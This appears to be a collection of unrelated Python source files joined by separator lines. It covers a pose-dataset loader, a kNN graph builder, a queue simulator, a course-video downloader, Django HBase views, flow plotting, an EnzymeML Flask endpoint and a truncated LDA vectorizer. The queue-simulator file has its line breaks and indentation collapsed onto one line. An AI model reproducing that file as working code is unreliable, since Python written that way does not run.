    def __init__(self, data_dir: Path = Path("/tmp/"), split: Split = Split.TRAIN, transforms=None):
        """
        Loads dataset if it is present in `data_dir`. Downloads and loads if not.

        :param data_dir: The directory in which to put data.
        """
        assert isinstance(split, Split)
        if not (data_dir / self.FOLDER_NAME).exists():
            self._download(data_dir)
        self.root = data_dir / self.FOLDER_NAME
        joints = loadmat(self.root / "joints.mat")["joints"]
        joints = np.moveaxis(joints, -1, 0)
        self.joints = np.moveaxis(joints, 1, 2)
        self.image_paths = list(
            sorted((self.root / "images").glob("*.jpg"), key=lambda p: int(p.stem[2:]))
        )
        self.transforms = transforms

    def _download(self, data_dir: Path):
        with tempfile.NamedTemporaryFile() as temp:
            download.stream(self.DATA_URL, temp)
            with zipfile.ZipFile(temp) as temp_zipped:
                temp_zipped.extractall(data_dir / self.FOLDER_NAME)

    def __getitem__(self, key: int):
        with self.image_paths[key].open("rb") as f:
            img = Image.open(f).convert("RGB")

        # This dataset only has a single person per image, but others may have more
        # Therefore, wrap keypoints in list.
        targets = OrderedDict()
        targets["keypoints"] = [self.joints[key]]

        if self.transforms:
            img, targets = self.transforms(img, targets)

        return img, targets

    def __len__(self):
        return self.joints.shape[0]


class LeedsSport(LeedsSportBase):
    FOLDER_NAME = "lsp_dataset_original"
    DATA_URL = "https://sam.johnson.io/research/lsp_dataset_original.zip"

    def __init__(self, data_dir: Path = Path("/tmp/"), split: Split = Split.TRAIN):
        """
        Loads dataset if it is present in `data_dir`. Downloads and loads if not.

        :param data_dir: The directory in which to put data.
        """
        super().__init__(data_dir, split)
        assert split is not Split.VAL, "This dataset does not have a canonical validation split."
        if split is Split.TRAIN:
            self.joints = self.joints[:1000]
            self.image_paths = self.image_paths[:1000]
        elif split is Split.TEST:
            self.joints = self.joints[1000:]
            self.image_paths = self.image_paths[1000:]
        self.split = split


class LeedsSportExtended(LeedsSportBase):
    FOLDER_NAME = "lsp_dataset_extended"
    DATA_URL = "https://sam.johnson.io/research/lspet_dataset.zip"

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.joints = np.moveaxis(self.joints, 1, 2)


if __name__ == "__main__":
    ds = LeedsSport(split=Split.TEST)
    # __getitem__ returns (image, targets); the keypoints live under the
    # "keypoints" key as a list of per-person joint arrays.
    print(ds[0][1]["keypoints"][0].shape)
    ds = LeedsSportExtended()
    print(ds[0][1]["keypoints"][0].shape)
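# ---------------------------------------------------------------------------
# Hedged sketch: the `transforms` hook above is called as
# `img, targets = self.transforms(img, targets)`, so any callable with that
# signature works. Example: a resize that rescales the keypoints to match.
# The per-joint layout is assumed to be (x, y, ...) in the first two columns,
# matching the LSP joints.mat convention.

def resize_with_keypoints(size=(256, 256)):
    def _transform(img, targets):
        w, h = img.size                      # PIL gives (width, height)
        img = img.resize(size)
        sx, sy = size[0] / w, size[1] / h
        scaled = []
        for kps in targets["keypoints"]:
            kps = kps.copy()                 # don't mutate the dataset's array
            kps[:, 0] *= sx                  # x coordinates
            kps[:, 1] *= sy                  # y coordinates
            scaled.append(kps)
        targets["keypoints"] = scaled
        return img, targets
    return _transform

# Usage (LeedsSportExtended forwards transforms via *args/**kwargs):
# ds = LeedsSportExtended(transforms=resize_with_keypoints())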
nilq/baby-python
python
import torch
import os
from sklearn.neighbors import kneighbors_graph
import time
import datetime
import numpy as np
from scipy import sparse


class GraphConstructor(object):
    """
    K-NearestNeighbors graph by Euclidean distance.
    """
    def __init__(self, config):
        self.temperature = config.temperature
        self.knn = config.knn
        self.dataset = config.dataset
        self.method = config.extractor  # The choice of extractor
        assert self.method in ('NT', 'AT', 'AE')
        self.extractor_save_dir = config.extractor_save_dir
        self.graph_size = None  # Number of nodes
        self.feature_name = '{}-{}-features.pt'.format(self.dataset.lower(), self.method.lower())
        self.feature_path = os.path.join(self.extractor_save_dir, self.feature_name)
        self.graph_name = '{}-{}-{}nn-graph.npz'.format(self.dataset.lower(), self.method.lower(), self.knn)
        self.graph_path = os.path.join(self.extractor_save_dir, self.graph_name)
        self.graph_connectivity_name = '{}-{}-{}nn-graph2.npz'.format(self.dataset.lower(), self.method.lower(), self.knn)
        self.graph_connectivity_path = os.path.join(self.extractor_save_dir, self.graph_connectivity_name)
        self.tensor = torch.load(self.feature_path)
        self.graph = None
        self.graph_connectivity = None

    def create_graph(self):
        if not os.path.exists(self.graph_path):
            print('Computing k-Neighbors graph...')
            X = self.tensor.cpu().numpy()
            start_time = time.time()
            self.graph = kneighbors_graph(X, self.knn, mode='distance', include_self=True, n_jobs=-1)
            self.graph_connectivity = kneighbors_graph(X, self.knn, mode='connectivity', include_self=True, n_jobs=-1)
            et = time.time() - start_time
            et = str(datetime.timedelta(seconds=et))[:-7]
            print('Time cost for KNN graph: ', et)
            sparse.save_npz(self.graph_path, self.graph)
            sparse.save_npz(self.graph_connectivity_path, self.graph_connectivity)
            print('Saved KNN graph into {}...'.format(self.graph_path))
        print('Using computed k-Neighbors graph: {}'.format(self.graph_path))
        self.graph = sparse.load_npz(self.graph_path)
        self.graph_connectivity = sparse.load_npz(self.graph_connectivity_path)

    def get_knn_index(self, item):
        assert isinstance(item, int) or isinstance(item, np.ndarray)
        if self.graph is None:
            self.create_graph()
        knn = self.graph_connectivity[item]
        indexes = knn.indices
        if isinstance(item, np.ndarray):
            indexes = indexes.reshape(item.size, -1)
            indexes = np.fliplr(indexes).copy()  # Ensure order
        return indexes

    def get_knn_distance(self, item):
        assert isinstance(item, int) or isinstance(item, np.ndarray)
        if self.graph is None:
            self.create_graph()
        knn = self.graph_connectivity[item]
        indexes = knn.nonzero()
        distances = self.graph[item][indexes]
        distances = np.asarray(distances).squeeze()
        if isinstance(item, np.ndarray):
            distances = distances.reshape(item.size, -1)
            distances = np.fliplr(distances).copy()  # Ensure order
        return distances

    def get_similarity(self, indices, labels):
        """Similarity of batch examples"""
        # Unsupervised similarity matrix
        notes = self.tensor[indices]
        batch_size = notes.size(0)
        a = notes.unsqueeze(1).expand(batch_size, batch_size, -1)
        b = notes.unsqueeze(0).expand(batch_size, batch_size, -1)
        euclidean_distance = ((a - b)**2).sum(dim=2)
        similarity = torch.exp(-euclidean_distance / self.temperature)

        # Supervised similarity matrix
        labels = labels.to(notes.device)
        temp_a = labels.repeat(labels.shape[0], 1)
        temp_b = labels.unsqueeze(1).repeat(1, labels.shape[0])
        mask_intrinsic = (temp_a == temp_b).type(dtype=torch.float32)  # Intrinsic mask
        mask_penalty = (temp_a != temp_b).type(dtype=torch.float32)  # Penalty mask
        matrix_intrinsic = mask_intrinsic * similarity  # Intrinsic matrix
        matrix_penalty = mask_penalty * similarity  # Penalty matrix

        return matrix_intrinsic, matrix_penalty


def test():
    import argparse
    parser = argparse.ArgumentParser()
    config = parser.parse_args()
    config.temperature = 100
    config.knn = 16
    config.extractor = 'AE'
    config.dataset = 'MNIST'
    config.extractor_save_dir = './results/extractor'
    config.data_dir = '../data'
    if not os.path.exists(config.extractor_save_dir):
        os.makedirs(config.extractor_save_dir)

    graph = GraphConstructor(config)
    indexes = graph.get_knn_index(1)
    print(indexes)

    from loader import get_loader
    import numpy as np
    data_loader = get_loader(config.dataset, config.data_dir, batch_size=128, mode='train', shuffle=False)
    data_iter = iter(data_loader)
    idx, (x, y) = next(data_iter)
    intrinsic, penalty = graph.get_similarity(idx, y)
    print(intrinsic)
    print(penalty)


if __name__ == '__main__':
    test()
nilq/baby-python
python
from collections import deque import pandas as pd import numpy as np RT_lambda = int(input("Input inter-arrival time of RT messages: ")) nonRT_lambda = int(input("Input inter-arrival time of non RT messages: ")) RT_service = int(input("Input service time of an RT message: ")) nonRT_service = int(input("Input service time of a nonRT message: ")) max_MC = int(input("Input the maximum Machine clock cycles you want to run the simulation for: ")) class Simulator: def __init__(self, n_RT=0, n_nonRT=0, s=0, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST = -1, \ RT_lambda=10, nonRT_lambda=10, RT_service=4, nonRT_service=4, max_MC= 50): self.n_RT = n_RT #number of items in RT queue self.n_nonRT = n_nonRT #number of items in non RT queue self.s = s #sever status, 0: ideal, 1: servicing RT msg, 2: servicing nonRT msg self.SCL = SCL #service clock self.MC = MC #master clock self.RTCL = RTCL #next RT packet arrival time self.nonRTCL = nonRTCL #next non RT packet arrival time self.preempted_ST = preempted_ST #pre-empted service time self.RT_lambda = RT_lambda #RT msg inter-arrival time self.nonRT_lambda = nonRT_lambda #nonRT msg inter-arrival time self.RT_service = RT_service #RT service time self.nonRT_service = nonRT_service #nonRT service time self.RT_queue = deque([]) #store the arrival time of RT msg self.nonRT_queue = deque([]) self.event_list = [[RTCL, 0], [nonRTCL, 1], [SCL, 2]] self.max_MC = max_MC self.df = pd.DataFrame(columns = ['MC', 'RTCL', 'nonRTCL', 'n_RT', 'n_nonRT', 'SCL', 's', 'preempted_ST']) def start_simulation(self): while self.MC <= self.max_MC: if any([self.n_RT, self.n_nonRT, self.SCL]): if self.preempted_ST == -1: self.preempted_ST = "" current_data = self.simulator_data() self.df = self.df.append(pd.Series(current_data, index=self.df.columns), ignore_index=True) print("MC: {}, RTCL: {}, nonRTCL: {}, nRT: {}, nnonRT: {}, SCL: {}, s: {}, pre-empted: {}".format(*current_data)) if self.preempted_ST == "": self.preempted_ST = -1 if self.SCL == 0: event = min(self.event_list[:2]) else: event = min(self.event_list) self.MC = event[0] if event[1] == 0: self.RT_arrival() elif event[1] == 1: self.nonRT_arrival() elif event[1] == 2: self.service_completion() def RT_arrival(self): self.RT_queue.append(self.RTCL) self.n_RT += 1 self.RTCL = self.MC + self.RT_lambda self.event_list[0][0] = self.RTCL if self.n_RT == 1 and self.s!=1: self.RT_queue.popleft() if self.s == 2: self.preempted_ST = self.SCL - self.MC if self.preempted_ST > 0: self.n_nonRT += 1 self.nonRT_queue.appendleft(self.preempted_ST + self.MC) elif self.preempted_ST == 0: self.preempted_ST = -1 self.SCL = self.MC + self.RT_service self.event_list[2][0] = self.SCL self.n_RT -= 1 self.s = 1 def nonRT_arrival(self): self.nonRT_queue.append(self.nonRTCL) self.n_nonRT += 1 self.nonRTCL = self.MC + self.nonRT_lambda self.event_list[1][0] = self.nonRTCL if self.n_nonRT == 1: if self.s == 0: self.nonRT_queue.popleft() self.SCL = self.MC + self.nonRT_service self.event_list[2][0] = self.SCL self.s = 2 self.n_nonRT -= 1 def service_completion(self): if len(self.RT_queue) > 0: self.SCL = self.MC + self.RT_service self.s = 1 self.n_RT -= 1 self.RT_queue.popleft() self.event_list[2][0] = self.SCL elif len(self.nonRT_queue) > 0: self.nonRT_queue.popleft() self.n_nonRT -= 1 self.s = 2 if self.preempted_ST > 0: self.SCL = self.MC + self.preempted_ST self.preempted_ST = -1 else: self.SCL = self.MC + self.nonRT_service self.event_list[2][0] = self.SCL else: self.s = 0 self.SCL = 0 self.event_list[2][0] = 0 def simulator_data(self): data = 
[self.MC, self.RTCL, self.nonRTCL, self.n_RT, self.n_nonRT, self.SCL, self.s, self.preempted_ST] return data def write_to_file(self, file_path): self.df.to_csv(file_path, index=False) simulator1 = Simulator(n_RT=0, n_nonRT=0, s=2, SCL=4, MC=0, RTCL=3, nonRTCL=5, preempted_ST=-1, \ RT_lambda=RT_lambda, nonRT_lambda=nonRT_lambda, RT_service=RT_service, nonRT_service=nonRT_service, max_MC=max_MC) file_path1 = 'task2.1_output.csv' simulator1.start_simulation() simulator1.write_to_file(file_path1) data = pd.read_csv(file_path1) print("\n") print("OUTPUT TABLE:") print(data)
nilq/baby-python
python
# coding:utf-8
from gevent import monkey;monkey.patch_all()
import config
from config import COURSEURL
from spider.parser import Parser
from spider.downloader import Downloader
from filedeal.file_downloader import File_Downloader

'''
This class holds the main logic of the spider.
'''


class SpiderMan(object):
    def __init__(self):
        self.downloader = Downloader()  # HTML downloader
        self.parser = Parser()  # HTML parser

    def crawl(self, url, ID):
        '''
        :param url: the URL to crawl
        :return:
        '''
        # The downloaded HTML
        html_cont = self.downloader.download(url)
        # Video metadata scraped from the page
        self.res_datas = self.parser.parser(html_cont, ID)

    def download(self, res_datas):
        '''
        :param res_datas: list of video metadata
        :return:
        '''
        id = 0  # Thread id, only used to group messages in the progress display
        for res_data in res_datas:
            downloader = File_Downloader(res_data, id)  # One download thread per video file (a bit lazy)
            id += 1
            config.PERLIST.append(0)  # List of completion percentages
            downloader.start()

    def cmdshow_gbk(self):
        print('#####################################################################')
        print("#imooc.com video downloader")
        print("#Open the chapter list page of the course you want on the imooc site and check the current URL")
        print("#For example, http://www.imooc.com/learn/615 means the course number is 615")
        print('#####################################################################')
        try:
            ID = input('Enter the number of the course to download: ')
            url = COURSEURL + str(ID)
            print("Course link to download:", url)
            print('Parsing videos, please wait:')
            self.crawl(url, ID)
            config.PERSUM = len(self.res_datas) * 100.0  # Total progress
            print('Found %d videos in total' % len(self.res_datas))
            print("Course title: %s" % self.res_datas[0].subject)
            for res_data in self.res_datas:
                print("----->%s" % res_data.filename)
            state = input('Choose quality (1: UHD, 2: HD, 3: SD): ')
            if int(state) not in [1, 2, 3]:
                print('Invalid input')
                return
            config.STATE = config.CHOOSE[int(state) - 1]
            self.download(self.res_datas)
        except Exception as e:
            print('The program crashed:', e)
            return
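# Hedged addition: a conventional entry point for interactive use; the module
# itself defines SpiderMan but never instantiates it.
if __name__ == '__main__':
    SpiderMan().cmdshow_gbk()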
nilq/baby-python
python
import mimetypes from collections import OrderedDict import json import requests from django.http import HttpResponse from django.shortcuts import render from .client import RestClient from .forms import * import datetime import time def index(request): return render(request, 'home/index.html') class OptimizationAlgorithms(object): def __init__(self, request): self.algorithms_definitions = [ { 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.SizeBalancingAlgorithm', 'action_id': 'optimize_size', 'config_form': SizeBalancingConfig(request.POST), 'is_repeatable': True, 'is_split_algorithm': False, 'display_graph': True }, { 'action_id': 'optimize_opentsdb_vip_split', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.OpenTSDBVipSplitAlgorithm', 'config_form': OpenTSDBVipSplitConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': True, 'display_graph': False }, { 'action_id': 'optimize_opentsdb_generic_split', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.OpenTSDBGenericSplitAlgorithm', 'config_form': OpenTSDBGenericSplitConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': True, 'display_graph': False }, { 'action_id': 'optimize_generic_split', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.GenericSplitAlgorithm', 'config_form': GenericSplitConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': True, 'display_graph': False }, { 'action_id': 'optimize_optaplanner', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.OptaPlannerBalancingAlgorithm', 'config_form': OptaPlannerBalancingConfig(request.POST), 'is_repeatable': True, 'is_split_algorithm': False, 'display_graph': True }, { 'action_id': 'optimize_restore_dump', 'full_name': 'com.dassault_systemes.infra.hoptim.smartbalancing.RestoreDumpAlgorithm', 'config_form': RestoreDumpConfig(request.POST), 'is_repeatable': False, 'is_split_algorithm': False, 'display_graph': True } ] def get_by_id(self, id): for definition in self.algorithms_definitions: if definition['action_id'] == id: return definition def hbase_region_servers(request): optimization_algorithms = OptimizationAlgorithms(request) json_tasks = RestClient.get_active_tasks() action_buttons = dict() json_status = dict() action_buttons = OrderedDict([ ("optimize_opentsdb_vip_split", "OpenTSDB VIP Split"), ("optimize_opentsdb_generic_split", "OpenTSDB Generic Split"), ("optimize_generic_split", "Generic Split"), ("optimize_optaplanner", "Opta Planner Balancing"), ("optimize_size", "Size Balancing"), ("optimize_restore_dump", "Restore Dump") ]) if request.method == 'POST' and not request.POST.get("cancel") and not request.POST.get("update_dump"): chosen_algorithm = {} if request.POST.get("optimize_size"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_size") elif request.POST.get("optimize_opentsdb_vip_split"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_opentsdb_vip_split") elif request.POST.get("optimize_opentsdb_generic_split"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_opentsdb_generic_split") elif request.POST.get("optimize_generic_split"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_generic_split") elif request.POST.get("optimize_optaplanner"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_optaplanner") elif request.POST.get("optimize_restore_dump"): chosen_algorithm = optimization_algorithms.get_by_id("optimize_restore_dump") elif request.POST.get("preview"): action_buttons = 
OrderedDict([ ("cancel", "Cancel"), ("execute", "Execute immediately"), ("execute_delayed", "Execute over SCHEDULER_DELAY settings") ]) action_id = request.POST.get("option") chosen_algorithm = optimization_algorithms.get_by_id(action_id) if chosen_algorithm['is_repeatable']: action_buttons.update({"execute_delayed_repeat": "Execute over SCHEDULER_DELAY settings + Repeat"}) action_buttons.move_to_end("execute_delayed_repeat", last=True) if chosen_algorithm['config_form'].is_valid(): json_config = chosen_algorithm['config_form'].get_json_config() json_result = RestClient.get_regions_smart_balancing_plan(chosen_algorithm['full_name'], json.dumps(json_config)) return render(request, 'home/hbase_region_servers_optimize_preview.html', {'action_buttons': action_buttons, 'json': json.dumps(json_result), 'json_current': json_result['currentRegionBalancing'], 'json_new': json_result['newRegionBalancing'], 'score_gain': json_result['scoreGainPercentage'], 'action_id': action_id, 'display_graph': chosen_algorithm['display_graph'], 'full_name': chosen_algorithm['full_name'], 'is_repeatable': chosen_algorithm['is_repeatable'], 'json_config': json_config}) if chosen_algorithm: json_split = '' if chosen_algorithm['is_split_algorithm']: json_split = RestClient.get_tsdb_presplit() action_buttons = OrderedDict([("cancel", "Cancel")]) return render(request, 'home/hbase_region_servers_optimize_config.html', {'json': json_split, 'action_buttons': action_buttons, 'action_id': chosen_algorithm['action_id'], 'form': chosen_algorithm['config_form']}) if request.POST.get("execute"): algorithm = optimization_algorithms.get_by_id(request.POST.get("option")) json_config = request.POST.get("config") json_status = RestClient.get_regions_smart_balancing_execute(algorithm['full_name'], json_config) time.sleep(10) elif request.POST.get("execute_delayed"): algorithm = optimization_algorithms.get_by_id(request.POST.get("option")) json_config = request.POST.get("config") json_status = RestClient.get_regions_smart_balancing_execute_delayed(algorithm['full_name'], json_config) elif request.POST.get("execute_delayed_repeat"): algorithm = optimization_algorithms.get_by_id(request.POST.get("option")) json_config = request.POST.get("config") json_status = RestClient.get_regions_smart_balancing_execute_delayed_repeat(algorithm['full_name'], json_config) if request.POST.get("update_dump"): RestClient.get_dump_update() json_result = RestClient.get_hbase_region_servers() if request.GET.get('chart_height', None): request.session['chart_height'] = request.GET.get('chart_height', None) elif not request.session.get('chart_height'): request.session['chart_height'] = 70 timestamp_seconds = int(RestClient.get_dump_timestamp())/1000 if timestamp_seconds > 0: value = datetime.datetime.fromtimestamp(timestamp_seconds) latest_update = value.strftime('%Y-%m-%d %H:%M:%S') else: latest_update = '' return render(request, 'home/hbase_region_servers.html', {'json': json_result, 'latest_update': latest_update, 'chart_height': request.session['chart_height'], 'json_tasks': json_tasks, 'json_status': json_status, 'action_buttons': action_buttons}) def hbase_tables(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_hbase_tables() return render(request, 'home/hbase_tables.html', {'json': json_result, 'json_tasks': json_tasks}) def hbase_regions(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_hbase_regions() return render(request, 'home/hbase_regions.html', {'json': json_result, 'json_tasks': 
json_tasks}) def hbase_regions_infos(request, encoded_name): json_tasks = RestClient.get_active_tasks() # if this is a POST request we need to process the form data if request.method == 'POST': # Call Split region: RestClient.get_split_region(encoded_name) json_result = RestClient.get_hbase_regions_infos(encoded_name) action_buttons = OrderedDict([ ("split_on_region", "Split this region") ]) action_url1 = encoded_name return render(request, 'home/hbase_regions_infos.html', {'json': json_result, 'encoded_name': encoded_name, 'json_tasks': json_tasks, 'action_buttons': action_buttons, 'action_url': action_url1,}) def hbase_tables_infos(request, table_name): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_hbase_tables_infos(table_name) if request.GET.get('chart_height', None): request.session['chart_height'] = request.GET.get('chart_height', None) elif not request.session.get('chart_height'): request.session['chart_height'] = 70 return render(request, 'home/hbase_tables_infos.html', {'json': json_result, 'table_name': table_name, 'chart_height': request.session['chart_height']}) def opentsdb_metric(request): json_tasks = RestClient.get_active_tasks() # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = MetricForm(request.POST, init_value="") # check whether it's valid: if form.is_valid(): metric_name = form.cleaned_data['metric_name'] form = MetricForm(init_value=metric_name) if request.POST.get("get_tags"): json_result = RestClient.get_metric(metric_name) elif request.POST.get("get_region_servers"): json_result = RestClient.get_metric_region_servers(metric_name) return render(request, 'home/opentsdb_metric.html', {'form': form, 'json': json_result, 'json_tasks': json_tasks}) # if a GET (or any other method) we'll create a blank form else: form = MetricForm(init_value="") return render(request, 'home/opentsdb_metric.html', {'form': form, 'json': '', 'json_tasks': json_tasks}) def opentsdb_regions(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_tsdb_regions() return render(request, 'home/opentsdb_regions.html', {'json': json_result, 'json_tasks': json_tasks}) def opentsdb_split(request): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_tsdb_presplit() action_buttons = OrderedDict([ ("download_presplit_file", "Download Presplit File") ]) if request.method == 'POST': if request.POST.get("download_presplit_file"): presplit_file = RestClient.get_tsdb_presplit_file() response = HttpResponse(presplit_file['content']) response['Content-Type'] = 'application/json' response['Content-Length'] = len(presplit_file['content']) response['Content-Encoding'] = 'Charset: utf-8' filename_header = 'filename=presplit_file.txt' response['Content-Disposition'] = 'attachment; ' + filename_header return response else: return render(request, 'home/opentsdb_split.html', {'json': json_result, 'json_tasks': json_tasks, 'action_buttons': action_buttons}) def opentsdb_regions_infos(request, encoded_name): json_tasks = RestClient.get_active_tasks() json_result = RestClient.get_tsdb_regions_infos(encoded_name) return render(request, 'home/opentsdb_regions_infos.html', {'json': json_result, 'encoded_name': encoded_name, 'json_tasks': json_tasks})
nilq/baby-python
python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 4 12:01:56 2018

Flow Visualization module within the FlowTools package.

@author: nhamilto
@contact: nicholas.hamilton@nrel.gov.
@version: v.0.1
"""

import matplotlib.pyplot as plt
import numpy as np

#%%
# 2D contour plot: coords = ['y', 'z'], val = flowfield.'U'
def contourf(flowfield, coords, cval):
    fig = plt.figure()
    x, y = flowfield.coordinates[coords[0]], flowfield.coordinates[coords[1]]
    plt.contourf(x, y, cval, 32)
    plt.xlabel(coords[0])
    plt.ylabel(coords[1])
    plt.colorbar()
    plt.tight_layout()
    plt.show()
    return fig


# Reynolds stresses in planes defined by x and y
def rst_contours(flowfield, coords, rst, commonscale=True, vmin=None, vmax=None):
    subplotindex = [0, 1, 2, 4, 5, 8]
    fig, axs = plt.subplots(3, 3, figsize=(6.5, 5), sharex=True, sharey=True)
    axs = axs.ravel()
    x, y = flowfield.coordinates[coords[0]], flowfield.coordinates[coords[1]]

    if commonscale is True:
        # plot all subfigures on a common scale
        if vmin is None:
            vmin = np.min([np.min(rst[key]) for key in rst.keys()])
        if vmax is None:
            vmax = np.max([np.max(rst[key]) for key in rst.keys()])

        for pt, key in zip(subplotindex, rst):
            axs[pt].contourf(x, y, rst[key], vmin=vmin, vmax=vmax)
            axs[pt].set_title(r'$\overline{' + key + '}$')
            axs[pt].axis('equal'); axs[pt].set_adjustable('box-forced')

        # make hidden subplot with full data range for correct colorbar
        fakedata = np.reshape(np.arange(np.prod(rst[key].shape)), rst[key].shape)
        fakedata = (fakedata - fakedata.min())/(fakedata.max() - fakedata.min())
        fakedata = fakedata*(vmax - vmin) + vmin
        axt = fig.add_axes([0.01, 0.01, 0.01, 0.01])
        cf = axt.contourf(x, y, fakedata, 32, vmin=vmin, vmax=vmax)
        fig.colorbar(cf, ax=axs.ravel().tolist())
        # hide the helper axes; it exists only to feed the colorbar
        axt.set_visible(False)

        # hide unwanted axes
        for pt in [3, 6, 7]:
            axs[pt].set_visible(False)

        # label super axes
        fig.text(0.5, 0.04, '$' + coords[0] + '$', ha='center')
        fig.text(0.05, 0.5, '$' + coords[1] + '$', va='center', rotation='vertical')
        return fig, axs

    else:
        # plot each subplot with a unique scale
        for pt, key in zip(subplotindex, rst):
            cf = axs[pt].contourf(x, y, rst[key])
            axs[pt].set_title(r'$\overline{' + key + '}$')
            fig.colorbar(cf, ax=axs[pt])
            axs[pt].axis('equal'); axs[pt].set_adjustable('box-forced')

        # hide unwanted axes
        for pt in [3, 6, 7]:
            axs[pt].set_visible(False)

        # label super axes
        fig.text(0.5, 0.04, '$' + coords[0] + '$', ha='center')
        fig.text(0.05, 0.5, '$' + coords[1] + '$', va='center', rotation='vertical')

        fig.tight_layout()
        return fig, axs
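# ---------------------------------------------------------------------------
# Hedged usage sketch: contourf() and rst_contours() only read
# `flowfield.coordinates[...]`, so a simple namespace with a `coordinates`
# dict is enough for a synthetic smoke test. The velocity field and the six
# Reynolds-stress components below are made up for illustration.

from types import SimpleNamespace

def _demo():
    y, z = np.meshgrid(np.linspace(-1, 1, 40), np.linspace(0, 2, 40))
    flowfield = SimpleNamespace(coordinates={'y': y, 'z': z})
    U = np.exp(-(y**2 + (z - 1)**2))          # synthetic streamwise velocity
    contourf(flowfield, ['y', 'z'], U)

    # six components, matching the six filled slots in rst_contours' 3x3 grid
    rst = {key: U * (i + 1) for i, key in
           enumerate(["u'u'", "u'v'", "u'w'", "v'v'", "v'w'", "w'w'"])}
    rst_contours(flowfield, ['y', 'z'], rst)

# _demo()  # uncomment to draw the synthetic example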
nilq/baby-python
python
''' File: addModel.py Project: restful Author: Jan Range License: BSD-2 clause ----- Last Modified: Wednesday June 23rd 2021 7:44:17 pm Modified By: Jan Range (<jan.range@simtech.uni-stuttgart.de>) ----- Copyright (c) 2021 Institute of Biochemistry and Technical Biochemistry Stuttgart ''' from flask import request, send_file, jsonify from flask_apispec import doc, marshal_with, MethodResource import os import json import shutil import io from pyenzyme.enzymeml.tools import EnzymeMLReader from pyenzyme.enzymeml.models import KineticModel from pyenzyme.restful.addModel_schema import addModelSchema from pyenzyme.enzymeml.tools.unitcreator import UnitCreator import tempfile desc = 'This endpoint is used to add a kinetic model to an existing EnzymeML document.\ Upload your document via the "omex" key as form-data as well as a JSON body with the \ reaction ID to add the model as well as the "equation" and "parameters" in an array.' class addModel(MethodResource): @doc(tags=['Add KineticModel'], description=desc) @marshal_with(addModelSchema(), code=200) def post(self): # check if the post request has the file part if 'omex' not in request.files: return jsonify( {"response": 'No file part'} ) if 'json' not in request.form: return jsonify( {"response": 'No json part'} ) # receive OMEX file file = request.files['omex'] body = json.loads(request.form['json']) # if user does not select file, browser also # submit an empty part without filename if file.filename == '': return jsonify({"response": 'No file selected'}) if file and file.filename.split('.')[-1] == "omex": file = file.read() # Send File dirpath = os.path.join( os.path.dirname(os.path.realpath(__file__)), "addmodel_temp" ) os.makedirs(dirpath, exist_ok=True) dirpath = os.path.join( dirpath, next(tempfile._get_candidate_names()) ) omexpath = os.path.join( dirpath, next(tempfile._get_candidate_names()) + '.omex' ) os.mkdir(dirpath) # Write to temp file with open(omexpath, 'wb') as f: f.write(file) # Save JSON in variable enzmldoc = EnzymeMLReader().readFromFile(omexpath) os.remove(omexpath) # parse parameters parameters = dict() for param in body['parameters']: name = param["name"] value = float(param["value"]) unit = UnitCreator().getUnit(param["unit"], enzmldoc) parameters[name] = (value, unit) # parse equation equation = body['equation'] # create KineticModel km = KineticModel(equation, parameters) # Write model to reaction enzmldoc.getReactionDict()[body['reaction']].setModel(km) enzmldoc.toFile(dirpath) path = os.path.join( dirpath, enzmldoc.getName().replace(' ', '_') + '.omex' ) f = io.BytesIO(open(path, "rb").read()) f.name = enzmldoc.getName() + '_Modeled.omex' shutil.rmtree( dirpath, ignore_errors=True ) return send_file( f, mimetype='omex', as_attachment=True, attachment_filename='%s_Modeled.omex' % enzmldoc.getName() )
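# ---------------------------------------------------------------------------
# Hedged client-side sketch: how a caller might hit this endpoint with the
# multipart layout it expects (an 'omex' file part plus a 'json' form field
# carrying reaction/equation/parameters, as described in `desc` above). The
# URL, file names and concrete parameter values are placeholders.
#
# import requests
#
# payload = {
#     "reaction": "r0",
#     "equation": "vmax * s0 / (km + s0)",
#     "parameters": [
#         {"name": "vmax", "value": 10.0, "unit": "mmole / l"},
#         {"name": "km", "value": 0.5, "unit": "mmole / l"},
#     ],
# }
# with open("experiment.omex", "rb") as f:
#     response = requests.post(
#         "http://localhost:5000/addmodel",          # endpoint URL assumed
#         files={"omex": f},
#         data={"json": json.dumps(payload)},
#     )
# with open("experiment_modeled.omex", "wb") as out:
#     out.write(response.content)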
nilq/baby-python
python
from sklearn.base import TransformerMixin, BaseEstimator
from gensim.models import LdaMulticore, CoherenceModel
from gensim.corpora import Dictionary
from gensim.matutils import corpus2dense, corpus2csc
import numpy as np


class GensimLDAVectorizer(BaseEstimator, TransformerMixin):

    def __init__(self, num_topics, return_dense=True, max_df=0.5, min_df=5,
                 **lda_params):
        """
        :param num_topics: number of topics for the LDA model
        :param return_dense: transform function returns dense or not
        :param max_df: maximum word document frequency, given as a fraction of
        the corpus (passed to Dictionary.filter_extremes as no_above)
        :param min_df: minimum word document frequency, given as an absolute
        document count (passed to Dictionary.filter_extremes as no_below)
        :param lda_params: parameters for the constructor of
        gensim.models.LdaMulticore
        """
        super().__init__()
        self.lda: LdaMulticore = None
        self.corpus = None
        self.lda_params = lda_params
        self.lda_params["num_topics"] = num_topics
        self.is_dense = return_dense
        self.max_df = max_df
        self.min_df = min_df

    def fit(self, docs):
        """
        :param docs: List of split strings.
        :return: GensimLDAVectorizer
        """
        id2word = Dictionary(docs)
        id2word.filter_extremes(self.min_df, self.max_df)
